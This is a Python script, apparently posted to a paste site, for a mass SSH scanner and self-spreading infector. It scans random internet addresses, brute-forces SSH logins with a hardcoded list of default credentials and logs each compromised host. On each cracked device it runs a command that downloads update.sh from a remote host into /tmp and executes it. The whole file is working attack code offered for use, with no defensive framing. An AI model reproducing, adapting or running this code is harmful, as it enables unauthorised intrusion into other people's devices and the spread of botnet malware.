Freaks SSH Scanner (SUPER FAST)

1. #!/usr/bin/python
2. #Phaaaat hax SSH scanner by Freak
3. import sys, re, os, paramiko, socket, random, itertools
4. from threading import Thread
5. from time import sleep
6. paramiko.util.log_to_file("ssh.log")
7. rekdevice="cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send
8.  
9. print "S-S-SUUUPER fast SSH scanner by Freak"
10. print
11.  
12. maxthreads = 376
13.  
14. global fh
15. fh = open("vulnz.txt","a+")
16.  
17. global passwords
18. passwords = [
19.     "root:root",
20.     "root:admin",
21.     "root:password",
22.     "root:default",
23.     "root:toor",
24.     "admin:admin",
25.     "admin:1234",
26.     "ubnt:ubnt",
27.     "vagrant:vagrant",
28.     "root:ubnt",
29.     "telnet:telnet",
30.     "guest:guest",
31.     "root:vagrant",
32.     "pi:raspberry",
33.     "default:",
34.     "admin:password",
35.     "cisco:cisco",
36.     "root:5up",
37.     "user:password",
38.     "user:user",
39.     "root:debian",
40.     "root:alpine",
41.     "root:ceadmin",
42.     "root:indigo",
43.     "root:linux",
44.     "root:rootpasswd",
45.     "root:timeserver"
46. ]
47.  
48.  
49. def SSHBrute(IP):
50.     global fh
51.     global passwords
52.     cracked = False
53.     for passwd in passwords:
54.         if cracked:
55.             return
56.         try:
57.             ssh = paramiko.SSHClient()
58.             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
59.             ssh.connect(IP, port = 22, username=passwd.split(":")[0], password=passwd.split(":")[1], key_filename=None, timeout=3)
60.             print "Freaks next root ->"+ passwd + ":" + IP
61.             cracked = True
62.             fh.write(passwd + ":" + IP + "\n")
63.             fh.flush()
64.             ssh.exec_command(rekdevice)
65.             sleep(20)
66.             ssh.close()
67.         except Exception as e:
68.             pass
69.  
70. def isRunningSSH(IP):
71.     try:
72.         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
73.         s.settimeout(0.37)
74.         result = s.connect_ex((IP, 22))
75.         s.close()
76.         if result == 0:
77.             return True
78.     except:
79.         return False
80.  
81. def ip_range(input_string):
82.     octets = input_string.split('.')
83.     chunks = [map(int, octet.split('-')) for octet in octets]
84.     ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
85.     addresses = []
86.     for address in itertools.product(*ranges):
87.         addresses.append('.'.join(map(str, address)))
88.     random.shuffle(addresses)
89.     for address in addresses:
90.         yield address
91.  
92. def gen_IP():
93.     first = random.choice(["2", "5", "31", "37", "41", "46", "50", "65", "67", "94", "95", "96", "118", "119", "122", "161", "168", "176", "178", "179", "180", "183", "185", "187", "188", "191", "198", "201"])
94.     ip = ".".join([first,str(random.randrange(1,256)),
95.     str(random.randrange(1,256)),str(random.randrange(1,256))])
96.     return ip
97.  
98. def HaxThread():
99.     while 1:
100.         try:
101.             IP = gen_IP()
102.             if isRunningSSH(IP):
103.                 if isRunningSSH('.'.join(IP.split(".")[:3])+".2") and isRunningSSH('.'.join(IP.split(".")[:3])+".254"):#entire ip range most likely pointed to one server
104.                     SSHBrute(IP)
105.                 else:
106.                     for IP in ip_range('.'.join(IP.split(".")[:3])+".0-255"):
107.                         if isRunningSSH(IP):
108.                             SSHBrute(IP)
109.         except Exception as e:
110.             print str(e)
111.             pass
112.  
113. global threads
114. threads = 0
115. for i in xrange(0,maxthreads):
116.     try:
117.         Thread(target = HaxThread, args = ()).start()
118.         threads += 1
119.     except Exception as e:
120.         pass